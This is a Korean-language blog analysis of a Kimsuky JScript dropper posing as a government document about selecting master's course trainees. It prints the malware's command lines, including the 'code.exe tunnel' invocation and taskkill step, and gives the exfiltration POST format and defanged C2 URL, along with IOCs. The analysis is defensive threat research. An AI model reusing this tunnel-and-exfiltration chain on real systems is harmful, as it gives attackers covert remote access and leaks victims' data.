김수키(Kimsuky) 인사혁신처 사칭 위탁교육생 선발 악성코드 분석

오늘은 북한 정찰총국 산하 해킹 조직 김수키(Kimsuky)에서 만든 악성코드인 인사혁신처 사칭 위탁교육생 선발 악성코드인 2026년 상반기 국내대학원 석사 야간과정 위탁교육생 선발관련 서류 (1).hwpx.jse 에 대해 알아보겠습니다.
해당 악성코드는 이메일 파일로 zip 파일 형태로 악성코드가 보내지면 해당 악성코드를 열었을 때에는 2개의 파일이 있는 것을 확인할 수가 있습니다.
2026년 상반기 국내대학원 석사 야간과정 위탁교육생 선발관련 서류.hwpx
2026년 상반기 국내대학원 석사 야간과정 위탁교육생 선발관련 서류 (1).hwpx
Ioc
ファイル名:2026년 상반기 국내대학원 석사야간과정 위탁교육생 선발관련 서류.hwpx.jse
サイズ:19 MB
MD5:52f1ff082e981cbdfd1f045c6021c63f
SHA-1:be85ab350916ab4d95048ebc50e748d75d959b6b
SHA-256:59eb093c10f11f612b8dadab258285aa2020219a0b86d65a5c890c214434809e
ファイル名:2026년 상반기 국내대학원 석사야간과정 위탁교육생 선발관련 서류 (1).hwpx.jse
サイズ:1 MB
MD5:9fe43e08c8f446554340f972dac8a68c
SHA-1:30b4a111ca13426054fd46834a9c6583cf344197
SHA-256:8b10ac9520a1ef24cf2269ec9ee4554b14d3617051f7650a948a03f534bec0d1

악성코드에 포함된 자바스크립트 난독화 코드악성코드에 포함된 자바스크립트 난독화 코드

악성코드 분석

일단 겉으로 보면 2026년 상반기 국내대학원 석사 야간과정 위탁교육생 선발관련 서류.hwpx.jse 것이 메인이 아닐까? 생각이 됩니다….
일단 저는 2026년 상반기 국내대학원 석사 야간과정 위탁교육생 선발관련 서류 (1).hwpx.jse를 따라가겠습니다.
1.미끼 문서(.hwpx)실행 (사용자 기만)
iKjgO5W4oM4 는 Base64 문자열이고, 앞부분이 UEsDB…. 로 시도->Base64로 인코딩된 ZIP 계열 페이로드
Microsoft.XMLDOM 의 bin.base64 트릭으로 Base64->바이트 디코딩
ADODB(.)Stream 으로 바이너리를 파일로 저장

사이버셰프로 푼 결과값

저장 위치:
결과적으로 C:\ProgramData
파일명:
dVnt6NwLeYW =2026년 상반기 국내대학원 석사 야간과정 위탁교육생 선발관련 서류 (1).hwpx 임
존재 확인 후 실행:
Run("C:\ProgramData\<문서>.hwpx)
2.VS Code CLI ZIP 다운로드
MSXML2.XMLHTTP`로 직접 다운로드
hxxps://vscode(.)download.prss(.)microsoft(.)com/.../vscode_cli_win32_x64_cli(.)zip

악성코드 정리

저장 경로:
C:\ProgramData\vscode_cli(.)zip
C:\ProgramData 폴더가 없으면 생성
zip 파일이 없을 때만 다운로드 중복 다운로드 회피
공격자는 악성 바이너리 대신 정상 툴 을 가져와 악용
뭐~탐지 회피이기는 하지만.
3.압축 해제 & code.exe 실행 파일 준비
압축 해제 1순위:Shell.Application ZIP 네임스페이스
Shell.Application COM으로 zip의 Items()를 CopyHere()로 복사
실패 시 2순위: PowerShell Expand-Archive
ode.exe 찾기

악성코드 가 생성한 파일들

findExe() 함수로 extractPath 하위 전체를 재귀 탐색
code.exe를 찾으면:
C:\ProgramData\code.exe 로 복사(덮어쓰기)
실행 전 검증
code.exe 가없으면 WScript.Quit()
내부 구조가 바뀌어도 동작하도록 설계
5.핵심 페이로드:VS Code Tunnel 생성+로그 유출 (C2/원격접속 확보)
기존 code.exe 종료

악성코드 가 보여주는 미끼 파일

taskkill /f /im code.exe->실패 원인 제거 및 세션 초기화
터널 실행+로그 저장
--name bizeugene :공격자가 고정적으로 쓰는 식별자, 토큰 역할
echo:터널 실행 과정에서 사용자 입력, 동의가 필요한 프롬프터가 있을 때 자동 입력을 흘려보내려는 전형적 속임수
out.txt:실행 결과/에러/URL 등을 저장하는 수집 지점
150초 동안 out.txt를 폴링(20초 간격)
out.txt가 있으면 전체 읽기
읽은 내용을 외부로 전송

ProcessExplorer 로 본 악성코드 실행

packets_20251214_190713.pcap

0.04MB

 

 

C2

hxxps://www(.)yespp(.)co(.)kr/common/include/code/out(.)php <-경기도 포천시에 있는
스크린 인쇄업 하는 사이트 해킹 2025.12.14 09:33:05 UTC 기존
해당 업로드 부분 삭제 조치됨

 

김수키 가 보게 될 파일 미끼 들

Content-Type: application/x-www-form-urlencoded
out=<out.txt내용 URL-인코딩>&token=bizeugene

성공 판단
out.txt에 hxxps://vscode(.)dev/tunnel 문자열이 있으면 성공으로 간주하고 루프 탈출
실패 시 재시도
다시 taskkill code.exe
out.txt 삭제 후 반복
공격자는 피해 PC에서 터널이 열릴 때까지 계속 시도하고 터널 URL/상태 로그를 웹서버로 받아 원격 접속을 준비

6. 난독화/분석방해 요소
xvpvIve8wrq = UEsDB...같은 Base64
7.IOC정리
파일/폴더
C:\ProgramData\.hwpx (미끼 문서:2026년 상반기 국내대학원 석사야간과정 위탁교육생 선발관련 서류 (1).hwpx)
C:\ProgramData\vscode_cli.zip
C:\ProgramData\vscode_cli\ (압축 해제 폴더)
C:\ProgramData\code.exe
C:\ProgramData\out.txt
네트워크
다운로드:
vscode(.)download(.)prss(.)microsoft(.)com (VS Code CLI zip)
유출:
hxxps://www(.)yespp(.)co(.)kr/common/include/code/out.php
POST 파라미터: out=...&token=bizeugene
프로세스/명령행
wscript.exe ,cscript.exe
cmd.exe /c echo,C:\ProgramData\code.exe" tunnel --name bizeugene ...
taskkill /f /im code.exe
powershell Expand-Archive ...
요약
1.미끼 문서(.hwpx)를 ProgramData에 생성 후 열어서 사용자 속이는 용도
2.백그라운드에서 VS Code CLI(zip)를 다운로드->압축 해제->code.exe 확보
3.code(.)exe tunnel 기능 으로 원격 접속(터널) 생성 시도
4.생성 과정의 출력 로그(out.txt)를 읽어 외부 서버(yespp.co.kr)로 POST 전송 하여
5.로그에 hxxps://vscode(.)dev/tunnel 나타나면 성공으로 판단하고 종료 아니면 계속 재시도
VS Code Tunnel 설치 목적
피해자 PC 파일 시스템 접근
터미널 실행
명령 실행
추가 악성코드 다운로드 및 실행
내부망 등으로 이동
아무튼, 개인정보 유출이며 석사 과정을 밟는 분들을 타겟으로 한 것 같기도 합니다.